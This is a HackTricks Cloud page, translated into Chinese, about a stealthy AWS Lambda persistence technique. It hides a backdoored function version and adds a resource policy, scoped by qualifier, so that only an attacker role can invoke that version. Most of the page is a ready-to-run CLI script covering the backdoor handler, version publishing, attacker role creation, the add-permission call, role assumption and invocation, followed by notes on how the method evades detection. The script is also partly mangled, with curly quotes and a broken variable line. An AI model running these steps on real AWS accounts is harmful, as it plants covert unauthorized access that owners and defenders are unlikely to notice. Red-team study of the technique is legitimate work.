HackTricks CloudAWS - Lambda Alias-Scoped Resource Policy Backdoor (Invoke specific hidden version)
Tip
学习并练习 AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
学习并练习 GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
学习并练习 Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
支持 HackTricks
- 查看 subscription plans!
- 加入 💬 Discord group 或者 telegram group 或 关注 我们的 Twitter 🐦 @hacktricks_live.
- 通过向 HackTricks 和 HackTricks Cloud github 仓库 提交 PRs 来分享 hacking tricks。
概述
使用带有攻击者逻辑的隐藏 Lambda 版本,并在 lambda add-permission 中使用 --qualifier 参数,将基于资源的策略限定到该特定版本(或别名)。仅向攻击者主体授予对 arn:aws:lambda:REGION:ACCT:function:FN:VERSION 的 lambda:InvokeFunction 权限。通过函数名或主别名的正常调用不受影响,而攻击者可以直接调用被植入后门的版本 ARN。
这比公开 Function URL 更隐蔽,并且不会更改主流量别名。
所需权限(攻击者)
lambda:UpdateFunctionCode,lambda:UpdateFunctionConfiguration,lambda:PublishVersion,lambda:GetFunctionConfigurationlambda:AddPermission(to add version-scoped resource policy)iam:CreateRole,iam:PutRolePolicy,iam:GetRole,sts:AssumeRole(to simulate an attacker principal)
攻击步骤(CLI)
发布隐藏版本,添加 qualifier 范围的权限,并以攻击者身份调用
```bash # Vars REGION=us-east-1 TARGET_FN=[Optional] If you want normal traffic unaffected, ensure a customer alias (e.g., “main”) stays on a clean version
aws lambda create-alias –function-name “$TARGET_FN” –name main –function-version –region “$REGION”
1) Build a small backdoor handler and publish as a new version
cat > bdoor.py <<PY import json, os, boto3
def lambda_handler(e, c): ident = boto3.client(sts).get_caller_identity() return {“ht”: True, “who”: ident, “env”: {“fn”: os.getenv(AWS_LAMBDA_FUNCTION_NAME)}} PY zip bdoor.zip bdoor.py aws lambda update-function-code –function-name “$TARGET_FN” –zip-file fileb://bdoor.zip –region $REGION aws lambda update-function-configuration –function-name “$TARGET_FN” –handler bdoor.lambda_handler –region $REGION until [ “$(aws lambda get-function-configuration –function-name “$TARGET_FN” –region $REGION –query LastUpdateStatus –output text)“ = “Successful” ]; do sleep 2; done VER=$(aws lambda publish-version –function-name “$TARGET_FN” –region $REGION –query Version –output text) VER_ARN=$(aws lambda get-function –function-name “$TARGET_FN:$VER” –region $REGION –query Configuration.FunctionArn –output text) echo “Published version: $VER ($VER_ARN)”
2) Create an attacker principal and allow only version invocation (same-account simulation)
ATTACK_ROLE_NAME=ht-version-invoker aws iam create-role –role-name $ATTACK_ROLE_NAME –assume-role-policy-document Version:2012-10-17 >/dev/null cat > /tmp/invoke-policy.json <<POL { “Version”: “2012-10-17”, “Statement”: [{ “Effect”: “Allow”, “Action”: [“lambda:InvokeFunction”], “Resource”: [“$VER_ARN”] }] } POL aws iam put-role-policy –role-name $ATTACK_ROLE_NAME –policy-name ht-invoke-version –policy-document file:///tmp/invoke-policy.json
Add resource-based policy scoped to the version (Qualifier)
aws lambda add-permission
–function-name “$TARGET_FN”
–qualifier “$VER”
–statement-id ht-version-backdoor
–action lambda:InvokeFunction
–principal arn:aws:iam::$(aws sts get-caller-identity –query Account –output text):role/$ATTACK_ROLE_NAME
–region $REGION
3) Assume the attacker role and invoke only the qualified version
ATTACK_ROLE_ARN=arn:aws:iam::$(aws sts get-caller-identity –query Account –output text):role/$ATTACK_ROLE_NAME CREDS=$(aws sts assume-role –role-arn “$ATTACK_ROLE_ARN” –role-session-name htInvoke –query Credentials –output json) export AWS_ACCESS_KEY_ID=$(echo $CREDS | jq -r .AccessKeyId) export AWS_SECRET_ACCESS_KEY=$(echo $CREDS | jq -r .SecretAccessKey) export AWS_SESSION_TOKEN=$(echo $CREDS | jq -r .SessionToken) aws lambda invoke –function-name “$VER_ARN” /tmp/ver-out.json –region $REGION >/dev/null cat /tmp/ver-out.json
4) Clean up backdoor (remove only the version-scoped statement). Optionally remove the role
aws lambda remove-permission –function-name “$TARGET_FN” –statement-id ht-version-backdoor –qualifier “$VER” –region $REGION || true
</details>
## 影响
- 授予一个隐蔽的后门,用于调用函数的隐藏版本,而无需修改主别名或暴露 Function URL。
- 通过基于资源的策略 `Qualifier`,将暴露限制为仅指定的版本/别名,降低检测面同时保留对攻击者主体的可靠调用。
> [!TIP]
> 学习并练习 AWS Hacking:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://hacktricks-training.com/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> 学习并练习 GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://hacktricks-training.com/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> 学习并练习 Az Hacking: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://hacktricks-training.com/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
>
> <details>
>
> <summary>支持 HackTricks</summary>
>
> - 查看 [**subscription plans**](https://github.com/sponsors/carlospolop)!
> - **加入** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) 或者 [**telegram group**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库 提交 PRs 来分享 hacking tricks。
>
> </details>